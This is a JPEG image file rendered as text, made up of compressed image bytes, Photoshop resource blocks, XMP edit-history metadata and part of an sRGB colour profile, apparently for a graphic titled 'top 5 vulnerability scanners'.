          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
